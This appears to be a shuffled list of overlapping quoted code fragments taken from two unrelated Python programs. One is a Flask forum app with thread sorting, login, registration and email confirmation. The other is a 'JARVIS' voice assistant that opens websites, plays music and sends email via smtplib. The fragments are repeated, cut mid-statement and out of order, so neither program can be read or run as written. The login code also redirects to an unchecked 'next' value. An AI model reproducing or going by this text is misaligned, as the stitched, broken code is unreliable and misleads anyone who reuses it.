.filter(Subreddit.name.in_(subreddit_subs)) else: subs = Thread.query.order_by(db.desc(Thread.hotness), db.desc(Thread.hotness)) return", "elif sort_type == 'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type ==", "url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending') else False", "# we use werzeug to validate user's password if user", "= user.email_token) email_response = send_email(\"Confirm upvote.pub email\", \"\"\"Please visit the", "sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type == 'comments':", "User.query.filter_by(email=form.email.data).first() # we use werzeug to validate user's password if", "thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom')", "cur_subreddit=home_subreddit(), thread_paginator=thread_paginator, num_searches=num_searches) @mod.route('/login/', methods=['GET', 'POST']) def login(): \"\"\" We", "by following the link sent in the confirmation email.', 'success')", "register(): \"\"\" Registration page \"\"\" if g.user: # If the", "methods=['GET', 'POST']) def view_all(): \"\"\" \"\"\" subreddit_list = Subreddit.query.all() form", "session can't be modified as it's signed, # it's a", "comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register(): \"\"\"", "session['user_id'] = user.id if 'next' in request.form and request.form['next']: return", "User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified = True db.session.commit() flash(\"Thank", "base_query.order_by(db.desc(Thread.hotness)) elif sort_type == 'top': base_query = base_query.order_by(db.desc(Thread.votes)) elif sort_type", "we are passing in a resultset, that means we are", "user = User(username=form.username.data, email=form.email.data, \\ password=generate_password_hash(form.password.data), university=get_school(form.email.data), email_token=random_string()) # Insert", "\"Trending\" if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html',", "methods=['GET', 'POST']) def login(): \"\"\" We had to do some", "'POST']) @requires_login def logout(): session.pop('user_id', None) return redirect(url_for('frontends.home')) @mod.route('/confirm-email/<string:token>') def", "\"\"\" user = User.query.filter_by(email_token=token).first() if user.email_token == token: user.email_verified =", "by creation date \"\"\" atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending", "the user in, as he now has an id db.session.commit()", "has an id db.session.commit() session['user_id'] = user.id flash('Thanks for signing", "'new': base_query = base_query.order_by(db.desc(Thread.created_on)) elif sort_type == 'publication_date': base_query =", "password if user and check_password_hash(user.password, form.password.data): # the session can't", "\"\"\" \"\"\" subreddit_list = Subreddit.query.all() form = None if g.user:", "redirect, url_for, abort, Markup) from werkzeug import check_password_hash, generate_password_hash from", "'tables', 'footnotes', 'metadata', 'markdown-in-html']) return render_template('markdown.html', page=md, **md.metadata) @mod.route('/search/', methods=['GET'])", 
"= int(cur_page) thread_paginator = None # if we are passing", "just looking to # quickly paginate some arbitrary data, no", "base.utils.misc import random_string, validate_sort_type mod = Blueprint('frontends', __name__, url_prefix='') @mod.before_request", "if trending else \"Frontpage\" thread_paginator = process_thread_paginator(trending=trending) return render_template('home.html', atom_url=atom_url,", "means we are just looking to # quickly paginate some", "User from base.threads.models import Thread, Publication from base.subreddits.models import Subreddit", "@mod.route('/') def home(sort_type='hot'): \"\"\" If not trending we order by", "and commit it db.session.add(user) email_confirm_link = url_for('frontends.confirm_email', token = user.email_token)", "user = User.query.filter_by(email=form.email.data).first() # we use werzeug to validate user's", "base.utils.user_utils import get_school from base.subreddits.forms import subreddit_subs, sub_form from base.utils.email", "= None # if we are passing in a resultset,", "redirect(url_for('frontends.home')) return render_template(\"register.html\", form=form, next=next) @mod.route('/subs/', methods=['GET', 'POST']) def view_all():", "Filter by user subs logger.info(g.user) if g.user: subreddit_subs = g.user.subreddit_subs.get('subs')", "Registration page \"\"\" if g.user: # If the user is", "if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user) if g.get('user'):", "rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because many sources pull from", "return subreddits def process_thread_paginator(trending=False, rs=None, subreddit=None, sort_type='hot'): \"\"\" abstracted because", "trending = True if request.path.endswith('trending') else False page_title = \"Trending\"", "in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) return render_template(\"register.html\",", "Allows users to search threads and comments \"\"\" query =", "of subreddits subreddits = Subreddit.query.all() return subreddits def process_thread_paginator(trending=False, rs=None,", "and comment.\", 'success') return redirect(url_for('frontends.home')) @mod.route('/register/', methods=['GET', 'POST']) def register():", "atom_url = url_for('subreddits.atom_feed', subreddit_name='frontpage', _external=True) trending = True if request.path.endswith('trending')", "# Log the user in, as he now has an", "thread_paginator = base_query.paginate(cur_page, per_page=threads_per_page, error_out=True) return thread_paginator @mod.route('/') def home(sort_type='hot'):", "email_confirm_link = url_for('frontends.confirm_email', token = user.email_token) email_response = send_email(\"Confirm upvote.pub", "from base.subreddits.models import Subreddit from base.users.decorators import requires_login from base.utils.user_utils", "sform.sub_group = subreddit.group if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return", "from base.utils.email import send_email from base.utils.misc import random_string, validate_sort_type mod", "if g.user: sform.value=subreddit.name in g.user.subreddit_subs['subs'] form.subs.append_entry(sform) return render_template('subreddits/subs.html', cur_subreddit=None, page_title='subs',", "= None if session.get('user_id'): g.user = User.query.get(session['user_id']) def home_subreddit(): logger.info(g.user)", "session.get('user_id'): g.user = User.query.get(session['user_id']) 
def home_subreddit(): logger.info(g.user) if g.get('user'): subreddit_subs", "= Subreddit.query.filter(Subreddit.name.in_(subreddit_subs)) else: # Default set of subreddits subreddits =", "error_out=True) return thread_paginator # sexy line of code :) base_query", "import markdown2 from flask import (Blueprint, request, render_template, flash, g,", ":) base_query = subreddit.threads if subreddit else Thread.query # Filter", "request.args: next = request.args['next'] form = RegisterForm(request.form) if form.validate_on_submit(): #", "render_template('home.html', atom_url=atom_url, page_title=page_title, cur_subreddit=home_subreddit(), thread_paginator=thread_paginator) @mod.route('/.atom') @mod.route('/.xml') @mod.route('/.rss') def atom_redirect():", "your email:\\n\\n{}{}\"\"\".format(request.url_root.strip(\"/\"), email_confirm_link), user.email) # Log the user in, as", "in request.form and request.form['next']: return redirect(request.form['next']) return redirect(url_for('frontends.home')) flash('Wrong email", "upvote.pub email\", \"\"\"Please visit the link below to confirm your" ]
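Each bracketed row in this dump is a shuffled list of overlapping word-level 10-grams taken from a single Python source file; the row closed above covers a Flask "frontends" view module (login, registration, email confirmation, subreddit subscriptions). Because consecutive shingles share n-1 words, the original token stream is recoverable by greedy overlap-chaining. Below is a minimal sketch of that reassembly, assuming the shingles are unique and advance one word at a time (the helper name `reassemble` is illustrative, not part of the dataset):

```python
from collections import defaultdict

def reassemble(shingles):
    """Rebuild a token stream from shuffled, overlapping word n-grams.

    Assumes each shingle of the source occurs exactly once and that
    consecutive shingles advance by one word (step = 1), which is what
    the rows in this dump appear to be.
    """
    grams = [tuple(s.split()) for s in shingles]
    n = len(grams[0])  # shingle width, e.g. 10 for the rows above
    by_prefix = defaultdict(list)
    for g in grams:
        by_prefix[g[:-1]].append(g)
    suffixes = {g[1:] for g in grams}
    # The first shingle is the one whose (n-1)-word prefix continues nothing.
    start = next(g for g in grams if g[:-1] not in suffixes)
    tokens, used = list(start), {start}
    while True:
        candidates = [g for g in by_prefix[tuple(tokens[-(n - 1):])] if g not in used]
        if not candidates:
            return " ".join(tokens)
        used.add(candidates[0])
        tokens.append(candidates[0][-1])

if __name__ == "__main__":
    demo = ["c d e f", "a b c d", "b c d e"]  # shuffled 4-grams of "a b c d e f"
    print(reassemble(demo))                   # -> a b c d e f
```

Calling `reassemble(row)` on a full row returns the module as one whitespace-joined line; if a 9-word context repeats in the source, the greedy choice can mis-order the repeated passages.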
[ "= pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change", "\"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir)", "more increase sentence to decrease sentence decreease sentence speak(\"According to", "#print(e) print(\"Say that again please\") return \"None\" return query def", ">= 12 and hour < 18: speak(\"Good afternoon\") else: speak(\"Good", "query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception as", "results = wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence", "return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo()", "try: speak(\"What should i say\")#error present content = take_command() to", "def take_command(): \"\"\" It takes microphone input from the user", "night\") speak(\"I am JARVIS how can i help you\") if", "if 'wikipedia' in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results", "speak(results) elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif", "wikipedia\") #print(results) speak(results) elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\")", "Exception as e: #print(e) print(\"Say that again please\") return \"None\"", "hour = int(datetime.datetime.now().hour) if hour >= 0 and hour <", "user and returns a string :return: \"\"\" r = sr.Recognizer()", "18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS how", "time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\")", "elif \" open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community", "os import smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice',", "webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs", "i say\")#error present content = take_command() to = \"<EMAIL>\" sendEmail(to,content)", "2021\" os.startfile(pycharmpath) #elif \"open command\" in query: # filelocation =", "engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the voice to female", "female change 0 to 1. def speak(audio): engine.say(audio) engine.runAndWait() pass", "takes microphone input from the user and returns a string", "wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence decreease sentence", "query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase sentence", "1.5 seconds to complete a sentence audio = r.listen(source) #Do", "sentence audio = r.listen(source) #Do read details try: print(\"Recognizing\") query", "= \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit() except Exception", "speak(\"What should i say\")#error present content = take_command() to =", "change 0 to 1. 
def speak(audio): engine.say(audio) engine.runAndWait() pass def", "# server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour", "decrease sentence decreease sentence speak(\"According to wikipedia\") #print(results) speak(results) elif", "import speech_recognition as sr import wikipedia import webbrowser import os", "# server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour)", "= int(datetime.datetime.now().hour) if hour >= 0 and hour < 12:", "1. def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It", "to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit() except", "hour >= 0 and hour < 12: speak(\"Good morning\") elif", "{query}\\n') except Exception as e: #print(e) print(\"Say that again please\")", "speak(\"Good morning\") elif hour >= 12 and hour < 18:", "print(\"Listening...\") r.pause_threshold = 1.5 # It will wait 1.5 seconds", "\"\"\" It takes microphone input from the user and returns", "music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the", "def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It takes", "wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase", "\"path of the particular file like above\" # os.startfile(filelocation) elif", "been sent\") exit() except Exception as e: print(e) speak(\"Sorry,I am", "\"open google\" in query: webbrowser.open(\"google.com\") elif \"play music\" in query:", "microphone input from the user and returns a string :return:", "change the voice to female change 0 to 1. 
def", "in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif", "print(f'user said : {query}\\n') except Exception as e: #print(e) print(\"Say", "os.startfile(pycharmpath) #elif \"open command\" in query: # filelocation = \"path", "particular file like above\" # os.startfile(filelocation) elif \" email to", "= engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the voice to", "\"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is", "read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said :", "with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5 # It", "am JARVIS how can i help you\") if __name__ ==", "returns a string :return: \"\"\" r = sr.Recognizer() with sr.Microphone()", "server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if hour", "speak(f\"The time is {strtime}\") elif \" open pycharm\" in query:", "Exception as e: print(e) speak(\"Sorry,I am not able to send", "print(e) speak(\"Sorry,I am not able to send this email\") exit()", "engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It takes microphone input", "i help you\") if __name__ == '__main__': wish_me() while True:", "details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n')", "as e: #print(e) print(\"Say that again please\") return \"None\" return", "open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\"", "you\") if __name__ == '__main__': wish_me() while True: query =take_command().lower()", "import smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id)", "1.5 # It will wait 1.5 seconds to complete a", "def wish_me(): hour = int(datetime.datetime.now().hour) if hour >= 0 and", "and hour < 12: speak(\"Good morning\") elif hour >= 12", "speech_recognition as sr import wikipedia import webbrowser import os import", "wish_me(): hour = int(datetime.datetime.now().hour) if hour >= 0 and hour", "smtplib engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) #", "morning\") elif hour >= 12 and hour < 18: speak(\"Good", "=take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','')", "'wikipedia' in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results =", "speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more", "as e: print(e) speak(\"Sorry,I am not able to send this", "voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the voice", "elif \" email to vijayesh\" or \"email to vijesh\" in", "query: webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\"", "afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS how can i", "print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception", "{strtime}\") elif \" open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm", "== '__main__': wish_me() while True: query =take_command().lower() if 'wikipedia' in", 
"def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content)", "will wait 1.5 seconds to complete a sentence audio =", "= 1.5 # It will wait 1.5 seconds to complete", "int(datetime.datetime.now().hour) if hour >= 0 and hour < 12: speak(\"Good", "seconds to complete a sentence audio = r.listen(source) #Do read", "speak(\"Good night\") speak(\"I am JARVIS how can i help you\")", "query: # filelocation = \"path of the particular file like", "exit() except Exception as e: print(e) speak(\"Sorry,I am not able", "query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \"", "= r.listen(source) #Do read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in')", "vijesh\" in query: try: speak(\"What should i say\")#error present content", "in query: # filelocation = \"path of the particular file", "\"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in", "# filelocation = \"path of the particular file like above\"", "# webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\") elif", "google\" in query: webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir", "if __name__ == '__main__': wish_me() while True: query =take_command().lower() if", "string :return: \"\"\" r = sr.Recognizer() with sr.Microphone() as source:", "sentence to decrease sentence decreease sentence speak(\"According to wikipedia\") #print(results)", "sentence decreease sentence speak(\"According to wikipedia\") #print(results) speak(results) elif 'open", "Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in query: # filelocation", "\" email to vijayesh\" or \"email to vijesh\" in query:", "pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To change the", "os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime =", "elif \"play music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs =", "input from the user and returns a string :return: \"\"\"", "to wikipedia\") #print(results) speak(results) elif 'open youtube' in query: #", "sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5 #", "0 and hour < 12: speak(\"Good morning\") elif hour >=", "speak(\"I am JARVIS how can i help you\") if __name__", "\"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit() except Exception as", "hour < 18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am", "'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\"", "command\" in query: # filelocation = \"path of the particular", "pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath)", "sr import wikipedia import webbrowser import os import smtplib engine", "again please\") return \"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28)", "import datetime import speech_recognition as sr import wikipedia import webbrowser", "try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said : 
{query}\\n') except", "complete a sentence audio = r.listen(source) #Do read details try:", "datetime import speech_recognition as sr import wikipedia import webbrowser import", "elif \"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time", "like above\" # os.startfile(filelocation) elif \" email to vijayesh\" or", "=smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me():", "= datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \" open pycharm\"", "take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\") exit()", "To change the voice to female change 0 to 1.", "12 and hour < 18: speak(\"Good afternoon\") else: speak(\"Good night\")", "< 18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS", "query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease", "import wikipedia import webbrowser import os import smtplib engine =", "please\") return \"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) #", "except Exception as e: #print(e) print(\"Say that again please\") return", "in query: webbrowser.open(\"google.com\") elif \"play music\" in query: music_dir =", ": {query}\\n') except Exception as e: #print(e) print(\"Say that again", "pass def take_command(): \"\"\" It takes microphone input from the", "r.pause_threshold = 1.5 # It will wait 1.5 seconds to", "r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception as e: #print(e)", "e: #print(e) print(\"Say that again please\") return \"None\" return query", ">= 0 and hour < 12: speak(\"Good morning\") elif hour", "server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def", "= r.recognize_google(audio,language='en-in') print(f'user said : {query}\\n') except Exception as e:", "else: speak(\"Good night\") speak(\"I am JARVIS how can i help", "to decrease sentence decreease sentence speak(\"According to wikipedia\") #print(results) speak(results)", "os.startfile(filelocation) elif \" email to vijayesh\" or \"email to vijesh\"", "server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if", "#Do read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user said", "and hour < 18: speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I", "= sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5", "wish_me() while True: query =take_command().lower() if 'wikipedia' in query: speak(\"Searching", "12: speak(\"Good morning\") elif hour >= 12 and hour <", "engine.setProperty('voice', voices[0].id) # To change the voice to female change", "the voice to female change 0 to 1. def speak(audio):", "to 1. 
def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\"", "webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\") elif \"play music\"", "Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in query: #", "\"email to vijesh\" in query: try: speak(\"What should i say\")#error", "voices[0].id) # To change the voice to female change 0", "It takes microphone input from the user and returns a", "query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open", "sr.Microphone() as source: print(\"Listening...\") r.pause_threshold = 1.5 # It will", "youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in", "True: query =take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\") query", "music\" in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs)", "or \"email to vijesh\" in query: try: speak(\"What should i", "take_command(): \"\"\" It takes microphone input from the user and", "query: try: speak(\"What should i say\")#error present content = take_command()", "to female change 0 to 1. def speak(audio): engine.say(audio) engine.runAndWait()", "decreease sentence speak(\"According to wikipedia\") #print(results) speak(results) elif 'open youtube'", "as source: print(\"Listening...\") r.pause_threshold = 1.5 # It will wait", "engine = pyttsx3.init('sapi5') voices = engine.getProperty('voices') engine.setProperty('voice', voices[0].id) # To", "server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if hour >=", "= \"path of the particular file like above\" # os.startfile(filelocation)", "webbrowser import os import smtplib engine = pyttsx3.init('sapi5') voices =", "hour >= 12 and hour < 18: speak(\"Good afternoon\") else:", "return \"None\" return query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465)", "increase sentence to decrease sentence decreease sentence speak(\"According to wikipedia\")", "strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \" open", "query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query: webbrowser.open(\"google.com\")", "It will wait 1.5 seconds to complete a sentence audio", "# os.startfile(filelocation) elif \" email to vijayesh\" or \"email to", "server.close() def wish_me(): hour = int(datetime.datetime.now().hour) if hour >= 0", "query =take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\") query =", "elif hour >= 12 and hour < 18: speak(\"Good afternoon\")", "e: print(e) speak(\"Sorry,I am not able to send this email\")", "help you\") if __name__ == '__main__': wish_me() while True: query", "\" open pycharm\" in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition", "= wikipedia.summary(query,sentences=2)#To read more increase sentence to decrease sentence decreease", "Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in query:", "0 to 1. 
def speak(audio): engine.say(audio) engine.runAndWait() pass def take_command():", "speak(\"Email has been sent\") exit() except Exception as e: print(e)", "to complete a sentence audio = r.listen(source) #Do read details", "in query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1]))", "from the user and returns a string :return: \"\"\" r", "sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close()", "present content = take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has", "to vijesh\" in query: try: speak(\"What should i say\")#error present", "datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The time is {strtime}\") elif \" open pycharm\" in", "pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\"", "how can i help you\") if __name__ == '__main__': wish_me()", "as sr import wikipedia import webbrowser import os import smtplib", "server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########') server.sendmail('<EMAIL>',to,content) server.close() def wish_me(): hour =", "the user and returns a string :return: \"\"\" r =", "to vijayesh\" or \"email to vijesh\" in query: try: speak(\"What", "above\" # os.startfile(filelocation) elif \" email to vijayesh\" or \"email", "in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open google\" in query:", "pyttsx3 import datetime import speech_recognition as sr import wikipedia import", "= \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\"", "query def sendEmail(to,content): server =smtplib.SMTP('smtp.gmail.com',28) # server.connect(\"smtp.gmail.com\",465) # server.ehlo() server.login('<EMAIL>','########')", "query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To read", "of the particular file like above\" # os.startfile(filelocation) elif \"", "filelocation = \"path of the particular file like above\" #", "a sentence audio = r.listen(source) #Do read details try: print(\"Recognizing\")", "elif \"open google\" in query: webbrowser.open(\"google.com\") elif \"play music\" in", "the particular file like above\" # os.startfile(filelocation) elif \" email", "os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\") speak(f\"The", "a string :return: \"\"\" r = sr.Recognizer() with sr.Microphone() as", "sendEmail(to,content) speak(\"Email has been sent\") exit() except Exception as e:", "wait 1.5 seconds to complete a sentence audio = r.listen(source)", "\"open command\" in query: # filelocation = \"path of the", "email to vijayesh\" or \"email to vijesh\" in query: try:", "r.listen(source) #Do read details try: print(\"Recognizing\") query = r.recognize_google(audio,language='en-in') print(f'user", "speak(\"Good afternoon\") else: speak(\"Good night\") speak(\"I am JARVIS how can", "and returns a string :return: \"\"\" r = sr.Recognizer() with", "in query: speak(\"Searching wikipedia\") query = query.replace('wikipedia','') results = wikipedia.summary(query,sentences=2)#To", "voice to female change 0 to 1. 
def speak(audio): engine.say(audio)", "JARVIS how can i help you\") if __name__ == '__main__':", "vijayesh\" or \"email to vijesh\" in query: try: speak(\"What should", "except Exception as e: print(e) speak(\"Sorry,I am not able to", "< 12: speak(\"Good morning\") elif hour >= 12 and hour", "content = take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been", "import webbrowser import os import smtplib engine = pyttsx3.init('sapi5') voices", "engine.runAndWait() pass def take_command(): \"\"\" It takes microphone input from", "print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime = datetime.datetime.now().strftime(\"%H:%M:%S\")", "time is {strtime}\") elif \" open pycharm\" in query: pycharmpath", "can i help you\") if __name__ == '__main__': wish_me() while", "speak(\"According to wikipedia\") #print(results) speak(results) elif 'open youtube' in query:", ":return: \"\"\" r = sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\")", "=\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif \"open command\" in", "r = sr.Recognizer() with sr.Microphone() as source: print(\"Listening...\") r.pause_threshold =", "in query: pycharmpath =\"C:\\\\Program Files\\\\JetBrains\\\\PyCharm Community Edition 2021\" os.startfile(pycharmpath) #elif", "audio = r.listen(source) #Do read details try: print(\"Recognizing\") query =", "that again please\") return \"None\" return query def sendEmail(to,content): server", "while True: query =take_command().lower() if 'wikipedia' in query: speak(\"Searching wikipedia\")", "elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\") elif \"open", "query: music_dir = \"D:\\\\vijayesh\\\\music\" songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif", "= take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email has been sent\")", "import pyttsx3 import datetime import speech_recognition as sr import wikipedia", "print(\"Say that again please\") return \"None\" return query def sendEmail(to,content):", "'__main__': wish_me() while True: query =take_command().lower() if 'wikipedia' in query:", "has been sent\") exit() except Exception as e: print(e) speak(\"Sorry,I", "# To change the voice to female change 0 to", "#print(results) speak(results) elif 'open youtube' in query: # webbrowser.Chrome.open_new(\"youtube.com\") webbrowser.open(\"youtube.com\")", "= os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query: strtime", "if hour >= 0 and hour < 12: speak(\"Good morning\")", "hour < 12: speak(\"Good morning\") elif hour >= 12 and", "# It will wait 1.5 seconds to complete a sentence", "say\")#error present content = take_command() to = \"<EMAIL>\" sendEmail(to,content) speak(\"Email", "said : {query}\\n') except Exception as e: #print(e) print(\"Say that", "songs = os.listdir(music_dir) print(songs) os.startfile(os.path.join(music_dir,songs[1])) elif \"the time\" in query:", "is {strtime}\") elif \" open pycharm\" in query: pycharmpath =\"C:\\\\Program", "speak(audio): engine.say(audio) engine.runAndWait() pass def take_command(): \"\"\" It takes microphone", "source: print(\"Listening...\") r.pause_threshold = 1.5 # It will wait 1.5", 